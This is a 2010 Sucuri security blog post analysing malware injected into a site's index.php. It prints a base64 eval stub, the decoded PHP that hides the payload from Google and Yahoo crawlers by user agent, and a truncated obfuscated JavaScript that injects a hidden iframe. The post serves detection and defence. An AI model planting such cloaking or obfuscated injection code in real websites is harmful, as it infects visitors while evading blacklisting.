• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malware hiding from Google

April 7, 2010David Dede

0
SHARES
FacebookTwitterSubscribe

Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already changing their tactics to hide from Google.

Why is this bad business for the malware writers? Well, if a site gets blacklisted, less users will visit it and less people will load their malware and get infected. Good for everyone else, bad for them.

Anyway, yesterday we were analyzing a malware that added the following code to the index.php of a site:

:< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ? >

After we decode it, we got a code that looked like:

if (!stristr($_SERVER[“HTTP_USER_AGENT”],”googlebot”)&&
(!stristr($_SERVER[“HTTP_USER_AGENT”],”yahoo”)))
{
return base64_decode(“PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+”);
}
else
{
return “”;
}

So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case. For everyone else they would see the malware javascript:

var bpxDsSbm8=’d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@”*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split(‘*%@’).join(“”));

If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.

Want to read more stories like this one? Subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net. With malware? Need help? send us an email.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, Website SecurityTags: Google, Hacked Websites, Obfuscation

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Tony

    April 7, 2010

    There is another wordpress hack happening this week where the code only returns bogus information if the user agent is google.

    http://blog.arpitnext.com/2010/04/wordpress-search-engine-cloak-hack.html

    Any chance you can get the sucuri monitoring service to make requests as googlebot in addition to a normal browser? Just make sure you don't diff the browser vs bot content as they are sometimes different intentionally, but still send alerts anytime there is a change for either user agent.

  2. Anonymous

    April 8, 2010

    "If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check" -> or maybe we have to begin to use their user agent to be ignored from malware 🙂

  3. http://sucuri.net

    April 8, 2010

    @anonymous: That would be a funny thing to do 🙂 I wonder what the malware writers would do at that point.. lol

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.